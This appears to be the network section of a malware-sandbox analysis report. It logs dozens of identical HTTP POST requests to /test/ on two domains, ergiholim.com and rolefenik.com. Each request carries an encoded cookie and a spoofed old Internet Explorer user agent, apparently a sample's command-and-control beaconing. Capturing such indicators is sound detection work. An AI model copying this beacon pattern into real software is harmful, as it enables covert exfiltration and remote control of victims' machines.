            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
